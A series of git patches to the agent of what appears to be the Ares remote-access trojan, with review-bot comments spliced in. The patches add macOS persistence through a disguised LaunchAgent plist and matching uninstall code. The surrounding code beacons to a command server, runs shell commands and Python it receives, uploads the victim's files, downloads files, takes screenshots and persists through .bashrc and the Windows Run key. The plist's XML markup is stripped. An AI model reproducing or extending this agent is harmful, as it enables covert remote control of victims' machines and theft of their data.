From 9032efb959a11e7250a41eda4dfe1447be61d527 Mon Sep 17 00:00:00 2001 From: hollow1 Date: Fri, 15 Dec 2017 14:42:48 +0200 Subject: [PATCH 1/4] NEW Added support for MacOS, agent should be compiled as linux --- agent/agent.py | 69 ++++++++++++++++++++++++++++++++++++++++---------- 1 file changed, 55 insertions(+), 14 deletions(-) diff --git a/agent/agent.py b/agent/agent.py index 1fb2ae9..20e203f 100755 --- a/agent/agent.py +++ b/agent/agent.py @@ -16,6 +16,7 @@ import tempfile import socket import getpass + if os.name == 'nt': from PIL import ImageGrab else: @@ -29,11 +30,11 @@ def wrapper(*_args, **kwargs): t = threading.Thread(target=func, args=_args) t.start() return + return wrapper class Agent(object): - def __init__(self): self.idle = True self.silent = False @@ -50,6 +51,8 @@ def get_install_dir(self): install_dir = self.expand_path('~/.ares') elif platform.system() == 'Windows': install_dir = os.path.join(os.getenv('USERPROFILE'), 'ares') + elif platform.system() == 'Darwin': + install_dir = self.expand_path('~/.ares') if os.path.exists(install_dir): return install_dir else: @@ -90,7 +93,7 @@ def get_UID(self): def server_hello(self): """ Ask server for instructions """ req = requests.post(config.SERVER + '/api/' + self.uid + '/hello', - json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username}) + json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username}) return req.text def send_output(self, output, newlines=True): @@ -102,8 +105,8 @@ def send_output(self, output, newlines=True): return if newlines: output += "\n\n" - req = requests.post(config.SERVER + '/api/' + self.uid + '/report', - data={'output': output}) + req = requests.post(config.SERVER + '/api/' + self.uid + '/report', + data={'output': output}) def expand_path(self, path): """ Expand environment variables and metacharacters in a path """ 
@@ -113,7 +116,8 @@ def expand_path(self, path):
 def runcmd(self, cmd):
 """ Runs a shell command and returns its output """
 try:
- proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+ proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
+ stderr=subprocess.PIPE)
 out, err = proc.communicate()
 output = (out + err)
 self.send_output(output)
@@ -134,13 +138,13 @@ def python(self, command_or_file):
 with open(command_or_file, 'r') as f:
 python_code = f.read()
 try:
- exec(python_code)
+ exec (python_code)
 except Exception as exc:
 self.send_output(traceback.format_exc())
 else:
 self.send_output("[*] Running python command...")
 try:
- exec(command_or_file)
+ exec (command_or_file)
 except Exception as exc:
 self.send_output(traceback.format_exc())
 sys.stdout = old_stdout
@@ -159,7 +163,7 @@ def upload(self, file):
 if os.path.exists(file) and os.path.isfile(file):
 self.send_output("[*] Uploading %s..." % file)
 requests.post(config.SERVER + '/api/' + self.uid + '/upload',
- files={'uploaded': open(file, 'rb')})
+ files={'uploaded': open(file, 'rb')})
 else:
 self.send_output('[!] No such file: ' + file)
 except Exception as exc:
@@ -171,7 +175,7 @@ def download(self, file, destination=''):
 try:
 destination = self.expand_path(destination)
 if not destination:
- destination= file.split('/')[-1]
+ destination = file.split('/')[-1]
 self.send_output("[*] Downloading %s..." % file)
 req = requests.get(file, stream=True)
 with open(destination, 'wb') as f:
@@ -203,7 +207,8 @@ def persist(self): f.write(desktop_entry) else: with open(self.expand_path("~/.bashrc"), "a") as f: - f.write("\n(if [ $(ps aux|grep " + os.path.basename(sys.executable) + "|wc -l) -lt 2 ]; then " + agent_path + ";fi&)\n") + f.write("\n(if [ $(ps aux|grep " + os.path.basename( + sys.executable) + "|wc -l) -lt 2 ]; then " + agent_path + ";fi&)\n") elif platform.system() == 'Windows': persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares') if not os.path.exists(persist_dir): @@ -212,10 +217,36 @@ def persist(self): shutil.copyfile(sys.executable, agent_path) cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares /t REG_SZ /d \"%s\"" % agent_path subprocess.Popen(cmd, shell=True) + elif platform.system() == 'Darwin': + persist_dir = self.expand_path('~/.ares') + if not os.path.exists(persist_dir): + os.makedirs(persist_dir) + agent_path = os.path.join(persist_dir, os.path.basename(sys.executable)) + shutil.copyfile(sys.executable, agent_path) + os.system('chmod +x ' + agent_path) + if not (os.path.exists(self.expand_path('~/Library/LaunchAgents/com.jss.hostconfig.plist'))): + plist_contents = ''' + + + + + Label + com.example.hostconfig + Program + ''' + agent_path + ''' + RunAtLoad + + KeepAlive + + + + ''' + with open(self.expand_path('~/Library/LaunchAgents/com.jss.hostconfig.plist'), 'w') as f: + f.write(plist_contents) self.send_output('[+] Agent installed.') def clean(self): - """ Uninstalls the agent """ + """ Uninstalls the agent """ if platform.system() == 'Linux': persist_dir = self.expand_path('~/.ares') if os.path.exists(persist_dir): 
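Review bot: The Darwin branch added to persist() in the `@@ -212,10 +217,36 @@` hunk has no comment naming what it leaves on the host, and the names it uses do not agree: the plist is written to `~/Library/LaunchAgents/com.jss.hostconfig.plist` while the Label inside it reads `com.example.hostconfig`. A one-line comment above the branch would make the footprint reviewable, e.g. `# macOS: copies the executable to ~/.ares and writes a per-user LaunchAgent plist (RunAtLoad, KeepAlive)`. For anyone triaging a host this gives three separate things to look for: the `~/.ares` copy, the plist file name, and the differing launchd label. The plist body as shown on this page has lost its XML markup, so its key/value structure cannot be checked from here, and persist() begins outside the hunk.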
@@ -228,8 +259,16 @@ def clean(self): persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares') cmd = "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares" subprocess.Popen(cmd, shell=True) - cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v ares /t REG_SZ /d \"cmd.exe /c del /s /q %s & rmdir %s\"" % (persist_dir, persist_dir) + cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v ares /t REG_SZ /d \"cmd.exe /c del /s /q %s & rmdir %s\"" % ( + persist_dir, persist_dir) subprocess.Popen(cmd, shell=True) + elif platform.system() == 'Darwin': + persist_dir = self.expand_path('~/.ares') + if os.path.exists(persist_dir): + shutil.rmtree(persist_dir) + plist_file = '~/Library/LaunchAgents/com.jss.hostconfig.plist' + if os.path.exists(self.expand_path(plist_file)): + os.remove(plist_file) self.send_output('[+] Agent removed successfully.') def exit(self): @@ -259,7 +298,7 @@ def zip(self, zip_name, to_zip): self.send_output("[+] Archive created: %s" % zip_name) except Exception as exc: self.send_output(traceback.format_exc()) - + @threaded def screenshot(self): """ Takes a screenshot and uploads it to the server""" @@ -308,7 +347,7 @@ def run(self): if not args: self.send_output('usage: upload ') else: - self.upload(args[0],) + self.upload(args[0], ) elif command == 'download': if not args: self.send_output('usage: download ') @@ -361,9 +400,11 @@ def run(self): self.exit() time.sleep(config.HELLO_INTERVAL) + def main(): agent = Agent() agent.run() + if __name__ == "__main__": main() From 30556281d40c21fa5b360b6b4ca5eb5b1735d385 Mon Sep 17 00:00:00 2001 From: hollow1 Date: Mon, 18 Dec 2017 11:42:38 +0200 Subject: [PATCH 2/4] FIX syntax fix --- agent/agent.py | 28 +++++++++++----------------- 1 file changed, 11 insertions(+), 17 deletions(-) diff --git a/agent/agent.py b/agent/agent.py index 20e203f..6f97c8d 100755 --- a/agent/agent.py +++ b/agent/agent.py 
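Review bot: In the Darwin branch added to clean() (the `@@ -228,8 +259,16 @@` hunk of PATCH 1/4), `os.remove(plist_file)` receives the literal `~/Library/LaunchAgents/com.jss.hostconfig.plist`, whereas the `os.path.exists` test on the line before checks `self.expand_path(plist_file)`; `os.remove` does not expand `~`, so when the plist exists the call raises instead of deleting it. By then `shutil.rmtree(persist_dir)` has already run, so the branch ends with `~/.ares` gone, the LaunchAgent plist still on disk, and, as far as the hunk shows, no handler before the `'[+] Agent removed successfully.'` report. The existence check and the removal should operate on one and the same expanded path. The practical effect for incident response is that the plist survives a `clean` and remains a usable indicator. clean() starts outside the hunk.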
@@ -16,7 +16,6 @@ import tempfile import socket import getpass - if os.name == 'nt': from PIL import ImageGrab else: @@ -30,11 +29,11 @@ def wrapper(*_args, **kwargs): t = threading.Thread(target=func, args=_args) t.start() return - return wrapper class Agent(object): + def __init__(self): self.idle = True self.silent = False @@ -93,7 +92,7 @@ def get_UID(self): def server_hello(self): """ Ask server for instructions """ req = requests.post(config.SERVER + '/api/' + self.uid + '/hello', - json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username}) + json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username}) return req.text def send_output(self, output, newlines=True): @@ -106,7 +105,7 @@ def send_output(self, output, newlines=True): if newlines: output += "\n\n" req = requests.post(config.SERVER + '/api/' + self.uid + '/report', - data={'output': output}) + data={'output': output}) def expand_path(self, path): """ Expand environment variables and metacharacters in a path """ @@ -116,8 +115,7 @@ def expand_path(self, path): def runcmd(self, cmd): """ Runs a shell command and returns its output """ try: - proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, - stderr=subprocess.PIPE) + proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = proc.communicate() output = (out + err) self.send_output(output) @@ -138,13 +136,13 @@ def python(self, command_or_file): with open(command_or_file, 'r') as f: python_code = f.read() try: - exec (python_code) + exec(python_code) except Exception as exc: self.send_output(traceback.format_exc()) else: self.send_output("[*] Running python command...") try: - exec (command_or_file) + exec(command_or_file) except Exception as exc: self.send_output(traceback.format_exc()) sys.stdout = old_stdout 
@@ -163,7 +161,7 @@ def upload(self, file):
 if os.path.exists(file) and os.path.isfile(file):
 self.send_output("[*] Uploading %s..." % file)
 requests.post(config.SERVER + '/api/' + self.uid + '/upload',
- files={'uploaded': open(file, 'rb')})
+ files={'uploaded': open(file, 'rb')})
 else:
 self.send_output('[!] No such file: ' + file)
 except Exception as exc:
@@ -173,7 +171,7 @@ def upload(self, file):
 def download(self, file, destination=''):
 """ Downloads a file the the agent host through HTTP(S) """
 try:
- destination = self.expand_path(destination)
+ destination= self.expand_path(destination)
 if not destination:
 destination = file.split('/')[-1]
 self.send_output("[*] Downloading %s..." % file)
@@ -207,8 +205,7 @@ def persist(self):
 f.write(desktop_entry)
 else:
 with open(self.expand_path("~/.bashrc"), "a") as f:
- f.write("\n(if [ $(ps aux|grep " + os.path.basename(
- sys.executable) + "|wc -l) -lt 2 ]; then " + agent_path + ";fi&)\n")
+ f.write("\n(if [ $(ps aux|grep " + os.path.basename(sys.executable) + "|wc -l) -lt 2 ]; then " + agent_path + ";fi&)\n")
 elif platform.system() == 'Windows':
 persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
 if not os.path.exists(persist_dir):
@@ -259,8 +256,7 @@ def clean(self):
 persist_dir = os.path.join(os.getenv('USERPROFILE'), 'ares')
 cmd = "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v ares"
 subprocess.Popen(cmd, shell=True)
- cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v ares /t REG_SZ /d \"cmd.exe /c del /s /q %s & rmdir %s\"" % (
- persist_dir, persist_dir)
+ cmd = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v ares /t REG_SZ /d \"cmd.exe /c del /s /q %s & rmdir %s\"" % (persist_dir, persist_dir)
 subprocess.Popen(cmd, shell=True)
 elif platform.system() == 'Darwin':
 persist_dir = self.expand_path('~/.ares')
@@ -347,7 +343,7 @@ def run(self): if not args: self.send_output('usage: upload ') else: - self.upload(args[0], ) + self.upload(args[0],) elif command == 'download': if not args: self.send_output('usage: download ') @@ -400,11 +396,9 @@ def run(self): self.exit() time.sleep(config.HELLO_INTERVAL) - def main(): agent = Agent() agent.run() - if __name__ == "__main__": main() From 243b1a15cd44404b40dff873557062f9d6042638 Mon Sep 17 00:00:00 2001 From: hollow1 Date: Mon, 18 Dec 2017 11:46:00 +0200 Subject: [PATCH 3/4] FIX syntax fix --- agent/agent.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/agent/agent.py b/agent/agent.py index 6f97c8d..3cf3590 100755 --- a/agent/agent.py +++ b/agent/agent.py @@ -92,7 +92,7 @@ def get_UID(self): def server_hello(self): """ Ask server for instructions """ req = requests.post(config.SERVER + '/api/' + self.uid + '/hello', - json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username}) + json={'platform': self.platform, 'hostname': self.hostname, 'username': self.username}) return req.text def send_output(self, output, newlines=True): @@ -161,7 +161,7 @@ def upload(self, file): if os.path.exists(file) and os.path.isfile(file): self.send_output("[*] Uploading %s..." % file) requests.post(config.SERVER + '/api/' + self.uid + '/upload', - files={'uploaded': open(file, 'rb')}) + files={'uploaded': open(file, 'rb')}) else: self.send_output('[!] No such file: ' + file) except Exception as exc: @@ -171,9 +171,9 @@ def upload(self, file): def download(self, file, destination=''): """ Downloads a file the the agent host through HTTP(S) """ try: - destination= self.expand_path(destination) + destination = self.expand_path(destination) if not destination: - destination = file.split('/')[-1] + destination= file.split('/')[-1] self.send_output("[*] Downloading %s..." % file) req = requests.get(file, stream=True) with open(destination, 'wb') as f: 
From 40938d4c119d9bd072ae4859ded650b73a6ecd1b Mon Sep 17 00:00:00 2001
From: hollow1
Date: Mon, 18 Dec 2017 11:47:02 +0200
Subject: [PATCH 4/4] FIX syntax fix
---
 agent/agent.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/agent/agent.py b/agent/agent.py
index 3cf3590..5f11ff7 100755
--- a/agent/agent.py
+++ b/agent/agent.py
@@ -104,7 +104,7 @@ def send_output(self, output, newlines=True):
 return
 if newlines:
 output += "\n\n"
- req = requests.post(config.SERVER + '/api/' + self.uid + '/report',
+ req = requests.post(config.SERVER + '/api/' + self.uid + '/report',
 data={'output': output})
 def expand_path(self, path):